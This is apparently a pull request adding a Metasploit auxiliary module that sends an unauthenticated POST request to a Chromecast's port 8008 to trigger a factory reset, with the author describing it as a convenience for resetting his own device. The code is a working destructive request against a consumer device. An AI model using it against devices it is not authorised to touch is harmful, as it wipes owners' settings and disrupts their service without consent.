### PR TITLE
Add Chromecast factory reset module

### DIFF
--- a/modules/auxiliary/admin/chromecast/chromecast_reset.rb
+++ b/modules/auxiliary/admin/chromecast/chromecast_reset.rb
@@ -1,0 +1,55 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'Chromecast Factory Reset',
+      'Description' => %q{
+        This module performs a factory reset on a Chromecast.
+      },
+      'Author' => ['wvu'],
+      'References' => [
+        ['URL', 'https://en.wikipedia.org/wiki/Chromecast']
+      ],
+      'License' => MSF_LICENSE
+    ))
+
+    register_options([
+      Opt::RPORT(8008)
+    ], self.class)
+  end
+
+  def run
+    res = reset
+
+    if res && res.code == 200
+      print_good('Factory reset performed')
+    end
+  end
+
+  def reset
+    begin
+      send_request_raw(
+        'method' => 'POST',
+        'uri' => '/setup/reboot',
+        'agent' => Rex::Text.rand_text_english(rand(42) + 1),
+        'ctype' => 'application/json',
+        'data' => '{"params": "fdr"}'
+      )
+    rescue Rex::ConnectionRefused, Rex::ConnectionTimeout,
+           Rex::HostUnreachable => e
+      fail_with(Failure::Unreachable, e)
+    ensure
+      disconnect
+    end
+  end
+
+end

--- a/modules/auxiliary/admin/chromecast/chromecast_reset.rb
+++ b/modules/auxiliary/admin/chromecast/chromecast_reset.rb
@@ -32,6 +32,8 @@ class Metasploit4 < Msf::Auxiliary
 
     if res && res.code == 200
       print_good('Factory reset performed')
+    elsif res
+      print_error("An error occurred: #{res.code} #{res.message}")
     end
   end
 


### PR DESCRIPTION
This is the last one. It's an easy one. I promise. :-)

This has been useful (really, I've just been using curl) when I can't (don't want to) reach the reset button or can't (don't want to) use the app.

**Verification steps:**
- [x] `set RHOST` to your Chromecast's IP
- [x] `run` to reset your Chromecast to factory defaults
- [x] Be patient
